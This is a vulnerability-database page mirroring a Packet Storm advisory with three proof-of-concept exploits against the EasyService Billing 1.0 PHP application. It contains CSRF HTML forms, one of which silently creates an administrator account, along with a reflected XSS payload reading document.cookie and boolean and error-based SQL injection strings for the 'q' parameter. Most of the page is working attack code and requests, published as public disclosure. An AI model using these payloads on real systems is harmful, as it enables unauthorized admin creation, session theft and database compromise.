Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDivya JainPACKETSTORM:147905
HistoryMay 26, 2018 - 12:00 a.m.

EasyService Billing 1.0 CSRF / XSS / SQL Injection

2018-05-2600:00:00
Divya Jain
packetstormsecurity.com
18

EPSS

0.008

Percentile

81.2%

JSON
`Exploit 1 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11445,CVE-2018-11442  
# Category: Webapps  
# Severity: Medium  
# Tested on: KaLi LinuX_x64  
# # # # # # # #  
#  
# Proof of Concept:  
//////////////////////////  
/ CSRF in Quotation Page /  
//////////////////////////  
# Initial Request:  
  
POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139  
Cookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 86  
  
quotation_id=139&quotation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1  
  
# CSRF POC:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" method="POST">  
<input type="hidden" name="quotation_id" value="139" />  
<input type="hidden" name="quotation_no" value="249" />  
<input type="hidden" name="des" value="testnew" />  
<input type="hidden" name="button" value="Save" />  
<input type="hidden" name="MM_update" value="form1" />  
<input type="hidden" name="MM_insert" value="form1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
///////////////////////////  
// CSRF in User Add Page //  
///////////////////////////  
  
# Initial Request  
  
POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://test.com/EasyServiceBilling/system-settings-user-new2.php  
Cookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 36  
  
type=Admin&un=a&pw=b&MM_insert=form1  
  
# CSRF POC  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://test.com/EasyServiceBilling/system-settings-user-new2.php?" method="POST">  
<input type="hidden" name="type" value="Admin" />  
<input type="hidden" name="un" value="adminTest" />  
<input type="hidden" name="pw" value="adminTest" />  
<input type="hidden" name="MM_insert" value="form1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
-->  
  
Exploit 2 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11443  
# Category: Webapps  
# Severity: Medium  
# Tested on: KaLi LinuX_x64  
# # # # #  
#   
# Proof of Concept:  
#  
///////////  
// XSS //  
///////////  
  
Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=  
Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27  
Parameter: q  
Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27  
  
###########################################################################  
  
  
  
Exploit 3 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q=  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11444  
# Category: Webapps  
# Severity: High  
# Tested on: KaLi LinuX_x64  
# # # # # # # #  
#  
  
# Proof of Concept:  
////////////////////////////////  
SQL Injection in q parameter  
///////////////////////////////  
Affected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=  
# Boolean Based Blind SQL  
Payload: 1337'OR%20NOT 1=1--  
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1--  
  
# Error-Based SQL  
Payload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD  
  
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD  
#################################  
  
`

Related

exploitpack 3
zdt 3
exploitdb 3
prion 4
cve 4
cvelist 4
nvd 4
exploitpack
exploitpack
EasyService Billing 1.0 - Cross-Site Request Forgery
2018-05-26 00:00:00
EasyService Billing 1.0 - q SQL Injection
2018-05-26 00:00:00
EasyService Billing 1.0 - Cross-Site Scripting
2018-05-26 00:00:00
zdt
zdt
EasyService Billing 1.0 - Cross-Site Request Forgery Vulnerability
2018-05-29 00:00:00
EasyService Billing 1.0 - Cross-Site Scripting Vulnerability
2018-05-29 00:00:00
EasyService Billing 1.0 - (q) SQL Injection Vulnerability
2018-05-29 00:00:00
exploitdb
exploitdb
EasyService Billing 1.0 - Cross-Site Request Forgery
2018-05-26 00:00:00
EasyService Billing 1.0 - Cross-Site Scripting
2018-05-26 00:00:00
EasyService Billing 1.0 - &#039;q&#039; SQL Injection
2018-05-26 00:00:00
prion
prion
Cross site request forgery (csrf)
2018-05-25 12:29:00
Cross site scripting
2018-05-25 12:29:00
Cross site request forgery (csrf)
2018-05-25 12:29:00
cve
cve
CVE-2018-11442
2018-05-25 12:29:00
CVE-2018-11443
2018-05-25 12:29:00
CVE-2018-11445
2018-05-25 12:29:00
cvelist
cvelist
CVE-2018-11443
2018-05-25 12:00:00
CVE-2018-11442
2018-05-25 12:00:00
CVE-2018-11444
2018-05-25 12:00:00
nvd
nvd
CVE-2018-11442
2018-05-25 12:29:00
CVE-2018-11443
2018-05-25 12:29:00
CVE-2018-11445
2018-05-25 12:29:00

EPSS

0.008

Percentile

81.2%

JSON
Related for PACKETSTORM:147905
exploitpack3zdt3exploitdb3prion4cve4cvelist4nvd4